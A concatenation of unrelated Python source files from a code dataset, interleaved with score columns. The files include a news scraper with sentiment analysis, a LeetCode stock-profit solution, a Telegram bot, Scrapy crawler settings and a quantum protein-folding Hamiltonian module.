return direc_list
def main(direc):
direc_list = get_direc(direc)
for file in direc_list:
file_code = file.split('/')[-1].split('.')[0]
table_csv = tptp.get_table_csv_results(file)
direc_new = direc + 'csv'
output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code)
with open(output_file, "wt") as fout:
fout.write(table_csv)
print('output file saved: ', output_file)
if __name__ == "__main__":
direc = sys.argv[1]
main(direc)
| 2.90625 | 3 |
build/lib/abp/adaptives/a3c/__init__.py | LinearZoetrope/abp | 0 | 12797472 | <reponame>LinearZoetrope/abp<filename>build/lib/abp/adaptives/a3c/__init__.py
from .adaptive import A2CAdaptive
| 1 | 1 |
SentiNews.py | simplesaad/SentiNews | 0 | 12797473 | import requests
from bs4 import BeautifulSoup
from selenium import webdriver
import time
import pandas as pd
import numpy as np
from datetime import datetime
from textblob import TextBlob
page = requests.get('https://qz.com/india/latest')
soup = BeautifulSoup(page.content, 'html.parser')
weblinks = soup.find_all('article')
pagelinks = []
for link in weblinks[5:]:
url = link.contents[0].find_all('a')[0]
pagelinks.append('http://qz.com'+url.get('href'))
authorname = []
title = []
thearticle = []
for link in pagelinks:
# store the text for each article
paragraphtext = []
# get url
url = link
# get page text
page = requests.get(url)
# parse with BFS
soup = BeautifulSoup(page.text, 'html.parser')
# get author name, if there's a named author
try:
abody = soup.find(class_='d3284 india').find('a')
aname = abody.get_text()
except:
aname = 'Anonymous'
# get article title
atitle = soup.find(class_="_21349 india none _4ca8e")
thetitle = atitle.get_text()
# get main article page
articlebody = soup.find(class_='_61c55')
# get text
articletext = soup.find_all('p')[8:]
# print text
for paragraph in articletext[:-1]:
# get the text only
text = paragraph.get_text()
paragraphtext.append(text)
# combine all paragraphs into an article
thearticle.append(paragraphtext)
authorname.append(aname)
title.append(thetitle)
# join paragraphs to re-create the article
myarticle = [' '.join(article) for article in thearticle]
# creating excel file "Quartz_India"
df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date'])
df.to_excel("Quartz_India.xlsx", index = False)
# save article data to file
data = {'Title':title,
'Author':authorname,
'PageLink':pagelinks,
'Article':myarticle,
'Date':datetime.now()}
oldnews = pd.read_excel('Quartz_India.xlsx')
news = pd.DataFrame(data=data)
cols = ['Title', 'Author', 'PageLink', 'Article', 'Date']
news = news[cols]
afronews = oldnews.append(news)
afronews.drop_duplicates(subset='Title', keep='last', inplace=True)
afronews.reset_index(inplace=True)
afronews.drop(labels='index', axis=1, inplace=True)
filename = 'Quartz_India.xlsx'
wks_name = 'Data'
writer = pd.ExcelWriter(filename)
afronews.to_excel(writer, wks_name, index=False)
writer.save()
# performing sentiment analysis on the article
data = pd.read_excel("Quartz_India.xlsx")
data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1)
data.to_excel("Sentiment_Analysis.xlsx",index = False)
| 3.296875 | 3 |
leetcode/188 best-time-to-buy-and-sell-stock-iv.py | xiewendan/algorithm | 0 | 12797474 | # -*- coding: utf-8 -*-
# __author__ = xiaobao
# __date__ = 2019/11/13 12:39:48
# desc: desc
# 给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。
# 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。
# 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。
# 示例 1:
# 输入: [2,4,1], k = 2
# 输出: 2
# 解释: 在第 1 天 (股票价格 = 2) 的时候买入,在第 2 天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润 = 4-2 = 2 。
# 示例 2:
# 输入: [3,2,6,5,0,3], k = 2
# 输出: 7
# 解释: 在第 2 天 (股票价格 = 2) 的时候买入,在第 3 天 (股票价格 = 6) 的时候卖出, 这笔交易所能获得利润 = 6-2 = 4 。
# 随后,在第 5 天 (股票价格 = 0) 的时候买入,在第 6 天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润 = 3-0 = 3 。
# 来源:力扣(LeetCode)
# 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv
# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
# 思路
# 复杂度(时间/空间)
# 时间
# 空间
# 代码
import sys
class Solution:
# def maxProfit(self, k: int, prices: List[int]) -> int:
def maxProfit(self, k, prices):
nLen = len(prices)
if nLen <= 1 or k == 0:
return 0
# k = 正无穷
if k >= nLen//2:
dp_i_0 = 0
dp_i_1 = -sys.maxsize
for i in range(nLen):
temp = dp_i_0
dp_i_0 = max(dp_i_0, dp_i_1 + prices[i])
dp_i_1 = max(dp_i_1, temp - prices[i])
return dp_i_0
# k = 有限次数
dp_i_k_0 = []
for i in range(nLen+1):
dp_i_k_0.append([0]*(k+1))
dp_i_k_1 = []
for i in range(nLen+1):
dp_i_k_1.append([0]*(k+1))
for j in range(k+1):
dp_i_k_1[0][j] = -sys.maxsize
for i in range(nLen+1):
dp_i_k_1[i][0] = -sys.maxsize
for i in range(1, nLen+1):
for j in range(k,0,-1):
dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1])
dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1])
return dp_i_k_0[nLen][k]
# 边界
solution = Solution()
## len(prices) <= 1
assert(solution.maxProfit(1, []) == 0)
assert(solution.maxProfit(1, [1]) == 0)
## len(prices) = 2
assert(solution.maxProfit(1, [1,4]) == 3)
assert(solution.maxProfit(2, [1,4]) == 3)
assert(solution.maxProfit(2, [4,1]) == 0)
## len(prices) = 3
assert(solution.maxProfit(1, [1,4,8]) == 7)
assert(solution.maxProfit(1, [1,8,4]) == 7)
assert(solution.maxProfit(1, [4,1,8]) == 7)
assert(solution.maxProfit(1, [4,8,1]) == 4)
assert(solution.maxProfit(1, [8,1,4]) == 3)
assert(solution.maxProfit(1, [8,4,1]) == 0)
## len(prices) >= 4
### 0次交易
assert(solution.maxProfit(1, [7,6,4,3,1]) == 0)
### 1次交易
assert(solution.maxProfit(1, [1,2,3,4,5]) == 4)
### 2次交易
assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5)
assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7)
### 3次交易
assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0)
assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6)
assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8)
assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10)
assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) == 10)
assert(solution.maxProfit(5, [7,1,5,3,6,4,7]) == 10) | 3.59375 | 4 |
LogicPy/__init__.py | Sunillad08/Digital_logic | 6 | 12797475 | <filename>LogicPy/__init__.py
import LogicPy.main_functions as main_functions
import LogicPy.conversion as conversion
import LogicPy.gates as gates
import LogicPy.flipflops as flipflops
import LogicPy.combination_logic as combination_logic
import LogicPy.display_terminals as display_terminals
import LogicPy.arithematic_circuit as arithematic_circuit
import LogicPy.counters as counters
import LogicPy.shift_registers as shift_registers | 1.195313 | 1 |
Network Simulations/Assignment 1/dataGenerator.py | neeladripal/bcse-lab | 0 | 12797476 | <reponame>neeladripal/bcse-lab
import random
# generate a random binary string
def generateMessage (size):
message = ''
for count in range(size):
message += str(random.randint(0,1))
return message
n = 32 * 10000 # size of data
file = open("testdata.txt", "w")
file.write(generateMessage(n))
file.close() | 3.046875 | 3 |
tags_to_sha.py | karajan1001/dvc-bench | 0 | 12797477 | <gh_stars>0
import os
from git import Repo
def convert_to_sha(tags_filename="tags.txt", hashes_filename="hashes.txt"):
tags = []
with open(tags_filename, "r") as fobj:
tags.extend([l.strip() for l in fobj.readlines()])
git_repo = Repo("dvc")
hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags]
with open(hashes_filename, "w") as fobj:
fobj.writelines(hashes)
convert_to_sha()
| 3.0625 | 3 |
pycomlink/core/__init__.py | jpolz/pycomlink | 1 | 12797478 | from __future__ import absolute_import
from .comlink_channel import ComlinkChannel
from .comlink import Comlink
| 1.0625 | 1 |
telegram_repository/utility.py | clement0010/eusoff-cca-bot | 0 | 12797479 | from spreadsheet.utility import get_user_ccas, is_registered, register_user
from telegram import InlineKeyboardButton, InlineKeyboardMarkup
from telegram.ext import ConversationHandler
import logging
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
CCA = 1
SECOND = 2
def start(update, context):
username = update.message.from_user.username
first_name = update.message.from_user.first_name
logger.info("User %s started the conversation.", first_name)
if is_registered(username):
ccas = get_user_ccas(username)
keyboard = [[InlineKeyboardButton(
cca, callback_data=cca)] for cca in ccas]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("Hi %s! Please select one of your CCAs." % (
first_name), reply_markup=reply_markup)
return CCA
else:
update.message.reply_text(
'Sorry, you are not a registered user. Please contact your CCA Head to register you or /register here.')
def back(update, context):
query = update.callback_query
username = query.from_user.username
first_name = query.from_user.first_name
ccas = get_user_ccas(username)
keyboard = [[InlineKeyboardButton(
cca, callback_data=cca)] for cca in ccas]
reply_markup = InlineKeyboardMarkup(keyboard)
query.edit_message_text("Hi %s! Please select one of your CCAs." % (
first_name), reply_markup=reply_markup)
return CCA
def end(update, context):
query = update.callback_query
query.answer()
query.edit_message_text(text="Ok, see you next time!")
return ConversationHandler.END
| 2.734375 | 3 |
bglib/kvui/rootwidget.py | dheller1/bglib | 0 | 12797480 | <gh_stars>0
from kivy.uix.widget import Widget
from kivy.uix.floatlayout import FloatLayout
class RootWidget(FloatLayout):
def __init__(self, **kwargs):
super().__init__(**kwargs)
| 2.015625 | 2 |
modules/FileManager.py | leeyongjoo/algorithm-problem-automation | 0 | 12797481 | <reponame>leeyongjoo/algorithm-problem-automation<gh_stars>0
from pathlib import Path
from modules.languages import get_extension
import os.path
from re import sub
# 상위 디렉토리 경로
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
class FileManager(object):
default_dir = '_downloads' # 파일을 저장할 기본 디렉토리
save_cnt = 0 # 파일 저장 카운트
def __init__(self, *dirs):
self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs)
mkdir_if_not_exists(self.dirname)
def write_file(self, name, content, language) -> bool:
basename = remove_win_special_char(name)
file = self.dirname / ''.join([basename, get_extension(language)])
if os.path.isfile(file):
# print(f'이미 존재!: {basename}')
return False
else:
with open(file, 'w', encoding='utf-8') as f:
f.write(content)
self.save_cnt += 1
return True
def get_default_dir_file_list(self):
return os.listdir(self.dirname)
def mkdir_if_not_exists(path_dir: str):
while True:
try:
if os.path.isdir(path_dir) is False:
os.mkdir(path_dir)
except FileNotFoundError:
mkdir_if_not_exists(
os.path.abspath(os.path.join(path_dir, os.pardir)))
else:
return
def remove_win_special_char(before_str):
"""
windows에서 파일명으로 사용하지 못하는 특수문자 제거
:param before_str: 문자열
:return: 특수문자가 제거된 문자열
"""
return sub('[\\\/:*?"<>|]', '', before_str)
def get_file_dirname(file_path):
return os.path.dirname(os.path.abspath(file_path)) | 2.734375 | 3 |
crawler/house_renting/settings.py | bernssolg/house-renting-master | 823 | 12797482 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from house_renting.spider_settings import lianjia, a58
BOT_NAME = 'house_renting'
COMMANDS_MODULE = 'house_renting.commands'
SPIDER_MODULES = ['house_renting.spiders']
NEWSPIDER_MODULE = 'house_renting.spiders'
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \
'Safari/605.1.15 '
USER_AGENTS = (
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; '
'.NET CLR 3.0.04506)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR '
'2.0.50727)',
'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR '
'3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; '
'.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR '
'3.0.04506.30)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 ('
'Change: 287 c9dfb30)',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0',
'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 '
'Safari/535.20',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 '
'Safari/605.1.15',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52',
)
ROBOTSTXT_OBEY = False
DOWNLOAD_DELAY = 10
CONCURRENT_REQUESTS_PER_DOMAIN = 1
COOKIES_ENABLED = False
TELNETCONSOLE_ENABLED = False
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en',
}
SPIDER_MIDDLEWARES = {
}
DOWNLOADER_MIDDLEWARES = {
'house_renting.middlewares.HouseRentingAgentMiddleware': 100,
'house_renting.middlewares.HouseRentingProxyMiddleware': 200,
'house_renting.middlewares.HouseRentingRetryMiddleware': 300,
'scrapy.downloadermiddlewares.retry.RetryMiddleware': None,
'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,
}
ITEM_PIPELINES = {
'house_renting.pipelines.HouseRentingPipeline': 100,
'house_renting.pipelines.DuplicatesPipeline': 200,
'scrapy.pipelines.images.ImagesPipeline': 300,
'house_renting.pipelines.ESPipeline': 400,
}
IMAGES_STORE = '/house-renting/data/images'
MEDIA_ALLOW_REDIRECTS = True
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
AUTOTHROTTLE_ENABLED = True
# The initial download delay
AUTOTHROTTLE_START_DELAY = 10
# The maximum download delay to be set in case of high latencies
AUTOTHROTTLE_MAX_DELAY = 10
# The average number of requests Scrapy should be sending in parallel to
# each remote server
AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0
# Enable showing throttling stats for every response received:
AUTOTHROTTLE_DEBUG = True
DOWNLOAD_TIMEOUT = 30
RETRY_TIMES = 3
LOG_LEVEL = 'INFO'
SPIDER_SETTINGS = {
'lianjia': {
'cities': lianjia.cities,
'available_cities': lianjia.available_cities,
'available_cities_map': lianjia.available_cities_map,
},
'58': {
'cities': a58.cities,
'available_cities': a58.available_cities,
'available_cities_map': a58.available_cities_map,
},
}
# ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES
ELASTIC_HOSTS = [
{'host': 'elastic', 'port': 9200},
]
REDIS_HOST = 'redis' # 默认为 None, 不会去重
REDIS_PORT = 6379 # 默认 6379
| 1.53125 | 2 |
proteinham/lattice/turn_circuit.py | couteiral/proteinham | 0 | 12797483 | <filename>proteinham/lattice/turn_circuit.py
import math
import numpy as np
import sympy as sp
import symengine as se
from abc import *
from tqdm import tqdm, trange
from copy import deepcopy
from itertools import chain
from functools import reduce
from .qlogic import *
from proteinham.core.hamiltonian import Hamiltonian
class CommonTurnCircuitHamiltonian(Hamiltonian):
is_TurnCircuit = True
def __init__(self, pepstring, ss_fmat='babej'):
"""Encapsulates the expression and methods of
a protein hamiltonian of the "turn circuit encoding"
form, described by Babbush et al., 2012."""
self._proc_input(pepstring)
self.ss_fmat = ss_fmat
self.n_bits = self.dim * (self.naas-1)
self._sum_strings = dict()
self._create_bitreg()
@property
def encoding(self):
return 'turn_circuit'
def build_exp(self):
self.expr = (self.naas+1) * self.back_term()
if self.dim == 3:
self.expr += (self.naas+1)**2 * self.redun_term()
self.expr += (self.naas+1) * self.steric_term()
self.expr += self.interaction_term()
#self.expr = se.expand(self.expr)
self.n_terms = len(self.expr.args)
def get(self, k):
"""Access the kth bit of the hamiltonian."""
return self.bit_list[k]
def half_adder(self, q_i, q_j):
"""Applies a half-adder."""
return qand([q_i, q_j]), qxor(q_i, q_j)
@property
@abstractmethod
def dim(self):
pass
class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian):
is_2D = True
@property
def dim(self):
return 2
def pointer(self, i):
"""Points to the start of the string describing
the ith turn."""
return 2*i
def circuit_xp(self, q_i, q_j):
"""Implements a circuit that returns 1
if the chain moves in the direction x+."""
return (1-q_i)*q_j
def circuit_xn(self, q_i, q_j):
"""Implements a circuit that returns 1
if the chain moves in the direction x-."""
return q_i*(1-q_j)
def circuit_yp(self, q_i, q_j):
"""Implements a circuit that returns 1
if the chain moves in the direction y+."""
return q_i*q_j
def circuit_yn(self, q_i, q_j):
"""Implements a circuit that returns 1
if the chain moves in the direction y-."""
return (1-q_i)*(1-q_j)
def sum_string(self, i, j, k):
"""Computes the sum string."""
if i > j:
raise ValueError("i > j")
if (i, j, k) in self._sum_strings.keys():
return self._sum_strings[(i, j, k)]
if k == 'x+':
sum_string = [self.circuit_xp(self.get(self.pointer(t)),
self.get(self.pointer(t)+1))
for t in range(i, j)]
elif k == 'x-':
sum_string = [self.circuit_xn(self.get(self.pointer(t)),
self.get(self.pointer(t)+1))
for t in range(i, j)]
elif k == 'y+':
sum_string = [self.circuit_yp(self.get(self.pointer(t)),
self.get(self.pointer(t)+1))
for t in range(i, j)]
elif k == 'y-':
sum_string = [self.circuit_yn(self.get(self.pointer(t)),
self.get(self.pointer(t)+1))
for t in range(i, j)]
else:
raise ValueError('k was {:s}'.format(k))
n_layers = j-i-1
counter = np.zeros(n_layers) # lazy way to keep track of half-adders
sum_string = list(reversed(sum_string))
for t in chain(range(n_layers),
reversed(range(n_layers-1))):
if t % 2 == 0:
iterator = range(0, t+1, 2) if t > 0 else [0]
else:
iterator = range(1, t+1, 2) if t > 1 else [1]
for h in iterator:
if self.ss_fmat == 'babej':
if counter[h] > math.log2(j-i):
continue
else:
counter[h] += 1
a, b = self.half_adder(sum_string[h],
sum_string[h+1])
sum_string[h] = a
sum_string[h+1] = b
maximum = int(math.ceil(math.log2(j-i)))
sum_string = list(reversed(sum_string))
self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)]
return self._sum_strings[(i, j, k)]
def back_term(self):
"""Ensures that the chain does not go
back on itself."""
return sum([
self.circuit_xp(self.get(self.pointer(i)),
self.get(self.pointer(i)+1)) *
self.circuit_xn(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1)) + \
self.circuit_xn(self.get(self.pointer(i)),
self.get(self.pointer(i)+1)) *
self.circuit_xp(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1)) + \
self.circuit_yp(self.get(self.pointer(i)),
self.get(self.pointer(i)+1)) *
self.circuit_yn(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1)) + \
self.circuit_yn(self.get(self.pointer(i)),
self.get(self.pointer(i)+1)) *
self.circuit_yp(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1))
for i in range(self.naas-2)])
def overlap(self, i, j):
"""Computes the overlap term for residues i and j."""
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0
if (j-i) % 2 != 0 or maximum < 2: return sp.numbers.Integer(0)
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-')
}
return qand(
[qxnor(sumstring['x+'][r],
sumstring['x-'][r])
for r in range(maximum)] + \
[qxnor(sumstring['y+'][r],
sumstring['y-'][r])
for r in range(maximum)]
)
def steric_term(self):
"""Ensures that the chain does not overlap."""
return sum([
sum([
self.overlap(i, j)
for j in range(i+1, self.naas)])
for i in range(self.naas)])
def a_x(self, i, j):
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-')
}
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0
if maximum == 0: return 0
prefactor = qand([
qxnor(sumstring['y+'][r],
sumstring['y-'][r])
for r in range(maximum)])
return prefactor * \
( qxor(sumstring['x+'][0],
sumstring['x-'][0]) \
* qand([
qxnor(sumstring['x+'][r],
sumstring['x-'][r])
for r in range(1, maximum)]) \
+ sum([
qxor(sumstring['x+'][p-2],
sumstring['x+'][p-1]) \
* qand([
qxnor(sumstring['x+'][r-1],
sumstring['x+'][r])
for r in range(1, p-1)]) \
* qand([
qxor(sumstring['x+'][r-1],
sumstring['x-'][r-1])
for r in range(1, p+1)]) \
* qand([
qxnor(sumstring['x+'][r-1],
sumstring['x-'][r-1])
for r in range(p+1, maximum+1)])
for p in range(2, maximum+1)]))
def a_y(self, i, j):
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-')
}
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0
if maximum == 0: return 0
prefactor = qand([
qxnor(sumstring['x+'][r],
sumstring['x-'][r])
for r in range(maximum)])
return prefactor *\
( qxor(sumstring['y+'][0],
sumstring['y-'][0]) \
* qand([
qxnor(sumstring['y+'][r],
sumstring['y-'][r])
for r in range(1, maximum)]) \
+ sum([
qxor(sumstring['y+'][p-2],
sumstring['y+'][p-1]) \
* qand([
qxnor(sumstring['y+'][r-1],
sumstring['y+'][r])
for r in range(1, p-1)]) \
* qand([
qxor(sumstring['y+'][r-1],
sumstring['y-'][r-1])
for r in range(1, p+1)]) \
* qand([
qxnor(sumstring['y+'][r-1],
sumstring['y-'][r-1])
for r in range(p+1, maximum+1)])
for p in range(2, maximum+1)]))
def interaction_term_ij(self, i, j):
return -1 * self.int_mat[i, j] * (self.a_x(i, j) + \
self.a_y(i, j))
def interaction_term(self):
"""Computes contacts between residues."""
expr = sp.numbers.Integer(0)
for i in range(self.naas-3):
for j in range(1, math.ceil((self.naas-i-1)/2)):
if self.int_mat[i, 1+i+2*j] == 0: continue
expr += self.interaction_term_ij(i, 1+i+2*j)
return expr
class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian):
is_3D = True
@property
def dim(self):
return 3
def pointer(self, i):
"""Points to the start of the string describing
the ith turn."""
return 3*i
def circuit_xp(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction x+."""
return q_i * q_j * q_k
def circuit_xn(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction x-."""
return q_i * (1-q_j) * (1-q_k)
def circuit_yp(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction y+."""
return q_i * (1-q_j) * q_k
def circuit_yn(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction y-."""
return q_i * q_j * (1-q_k)
def circuit_zp(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction z+."""
return (1-q_i) * (1-q_j) * q_k
def circuit_zn(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction z-."""
return (1-q_i) * q_j * (1-q_k)
def circuit_000(self, q_i, q_j, q_k):
"""Implements a circuit that checks the
nonsensical string 000."""
return (1-q_i) * (1-q_j) * (1-q_k)
def circuit_011(self, q_i, q_j, q_k):
"""Implements a circuit that checks the
nonsensical string 000."""
return (1-q_i) * q_j * q_k
def sum_string(self, i, j, k):
"""Computes the sum string."""
if i > j:
raise ValueError("i > j")
if (i, j, k) in self._sum_strings.keys():
return self._sum_strings[(i, j, k)]
if k == 'x+':
sum_string = [self.circuit_xp(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
elif k == 'x-':
sum_string = [self.circuit_xn(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
elif k == 'y+':
sum_string = [self.circuit_yp(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
elif k == 'y-':
sum_string = [self.circuit_yn(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
elif k == 'z+':
sum_string = [self.circuit_zp(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
elif k == 'z-':
sum_string = [self.circuit_zn(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
else:
raise ValueError('k was {:s}'.format(k))
n_layers = j-i-1
counter = np.zeros(n_layers) # lazy way to keep track of half-adders
sum_string = list(reversed(sum_string))
for t in chain(range(n_layers),
reversed(range(n_layers-1))):
if t % 2 == 0:
iterator = range(0, t+1, 2) if t > 0 else [0]
else:
iterator = range(1, t+1, 2) if t > 1 else [1]
for h in iterator:
if self.ss_fmat == 'babej':
if counter[h] > math.log2(j-i):
continue
else:
counter[h] += 1
a, b = self.half_adder(sum_string[h],
sum_string[h+1])
sum_string[h] = a
sum_string[h+1] = b
maximum = int(math.ceil(math.log2(j-i)))
sum_string = list(reversed(sum_string))
self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)]
return self._sum_strings[(i, j, k)]
def redun_term(self):
"""Implements the term that penalises meaningless
residue bitstrings 000 and 011."""
return sum([
self.circuit_000(self.get(self.pointer(k)),
self.get(self.pointer(k)+1),
self.get(self.pointer(k)+2)) + \
self.circuit_011(self.get(self.pointer(k)),
self.get(self.pointer(k)+1),
self.get(self.pointer(k)+2))
for k in range(self.naas-1)])
def back_term(self):
"""Ensures that the chain does not go
back on itself."""
return sum([
self.circuit_xp(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_xn(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2)) + \
self.circuit_xn(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_xp(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2)) + \
self.circuit_yp(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_yn(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2)) + \
self.circuit_yn(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_yp(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2)) + \
self.circuit_zp(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_zn(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2)) + \
self.circuit_zn(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_zp(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2))
for i in range(self.naas-2)])
def overlap(self, i, j):
"""Computes the overlap term for residues i and j."""
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0
if (j-i) % 2 != 0 or maximum < 2: return sp.numbers.Integer(0)
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-'),
'z+': self.sum_string(i, j, 'z+'),
'z-': self.sum_string(i, j, 'z-'),
}
return qand(
[qxnor(sumstring['x+'][r],
sumstring['x-'][r])
for r in range(maximum)] + \
[qxnor(sumstring['y+'][r],
sumstring['y-'][r])
for r in range(maximum)] + \
[qxnor(sumstring['z+'][r],
sumstring['z-'][r])
for r in range(maximum)]
)
def steric_term(self):
"""Ensures that the chain does not overlap."""
return sum([
sum([
self.overlap(i, j)
for j in range(i+1, self.naas)])
for i in range(self.naas)])
